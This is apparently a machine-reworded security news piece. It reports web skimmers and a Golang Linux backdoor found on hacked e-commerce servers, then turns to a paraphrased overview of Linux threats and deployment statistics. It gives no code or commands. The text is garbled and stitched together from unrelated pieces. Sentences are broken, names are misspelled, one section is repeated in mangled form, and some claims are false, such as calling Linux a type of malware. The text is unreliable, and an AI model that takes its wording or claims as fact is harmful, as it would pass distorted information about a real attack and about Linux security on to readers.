Hackers deploy Linux malware, web skimmer on e-commerce servers

Security researchers have discovered. Key online store websites have credit card skimmers. After injecting this, the attackers are also deploying a Linux backdoor on the compromised e-commerce server. Attackers hack online and tell customers to download fake payment forms on the payment pages displayed. And use this script to inject. The store found that the attacker began with an automated e-commerce attack investigation. Tested dozens of vulnerabilities across common online store platforms. Sansei’s threat was reveal by the research team.

Linux malware not detected by the security software

The same server contains malware spotted by the Dutch cyber security company Sansec. Golang-bas malware was download as linux_avp executable. And executed on the infringing server. Once started, it immediately removes itself from the disk. And disguises itself as a “ps -ef” process that will be used to get a list of ongoing processes. linux_avp Analyzing the backdoor, Sansec found. It is then awaiting orders from servers in Beijing hosted on Alibaba’s network.

They also found that the malware would gain persistence by adding a new crontab entry that would re-download the malicious payload from its command and control server and reinstall the backdoor if it is detected and removed or the server reboots. So far, this backdoor has not been detected by anti-malware engines on VirusTotal even though a sample was first uploaded over a month ago on October 8.

The downloader could be the creator of linux_avp since it was submitt a day after researchers at Dutch cybersecurity company Sansec spotted it while investigating the e-commerce site breach.

This article discusses the state of Linux security

Linux is powerful, universal, and reliable, but it is not without its flaws; like other operating systems, it is always susceptible to attack. This article discusses the state of Linux security in the first half of 2021 and provides an in-depth look at the Linux threat landscape. We discuss several pressing security issues that affect Linux, including the types of malware that exist in the Linux world, vulnerabilities that affect the Linux operating system, and the various software stacks that run on it. This article will also cover web application security risks and how attackers abuse them to compromise Linux systems running in the cloud.

The data presented in this article is from Data Lake for all searches on Trend MicroTMSmart Protection Network ™ (SPN), or all Trend Micro products. We also collected data from honeypots, sensors, anonymous telemetry and other backend services. This data represents the true prevalence of malware exploitation and insecurity in enterprises. In various verticals from small organizations to large industries.

Many consider Linux to be a unique operating system due to its stability, flexibility, and open-source nature. His stellar reputation is support by his many notable accomplishments over the past few years. For example, 100% of the top 500 supercomputers in the world run Linux, and 50.5% of the top 1000 websites in the world use it, according to a survey by W3Techs. Our previous article explained how Linux dominates the cloud, running on 90% of public cloud workloads in 2017. Linux is also uniquely support for cloud workloads at the best value for money in the world. using Advance RISC Machines (ARM) processors, such as AWS Graviton. And besides running on 96.3% of the world’s top 1 million web servers, Linux also powers smartwatches, bullet trains, and even the world’s major space programs.

We examine a few squeezing security gives that influence Linux

Linux is amazing, all-inclusive, and dependable, however, it isn’t without its imperfections; like other working frameworks, it is consistently defenseless to assault. This article examines the Linux security province in the early part of 2021. And Linux looks at the threat scene from top to bottom. Linux is a type of malware that exists for the world. Weaknesses affecting the Linux working framework and the sudden increase in demand. We examine some of the security factors that affect Linux, keeping in mind the various programming stacks. This article is also aggressive in thinking twice about the security risks of web applications and the framework that runs in the cloud. Will include how they are abus.

Among Linux / Unix-based deployments, Red Hat employs a large portion of enterprise users, followed by AWS Linux and Ubuntu. Organizations rely on well-maintained sources of Linux deployments for their workloads, and this chart reflects the support provided by vendors. For example, Red Hat Enterprise Linux (RHEL) and Amazon Linux AMI. They are the first to offer solutions, especially for their supported versions. This data distribution was not surprising to most readers. However, it should be not that about 2.6% of them are IBM AIX and Oracle Solaris. AIX and Oracle Solaris are known for their stability and robustness; businesses run critical workloads on these platforms.

At the time of writing, all command and control (C&C) servers were down, reminiscent of typical attacks targeting a small number of targets, with operators shutting down the infrastructure once their goals are met.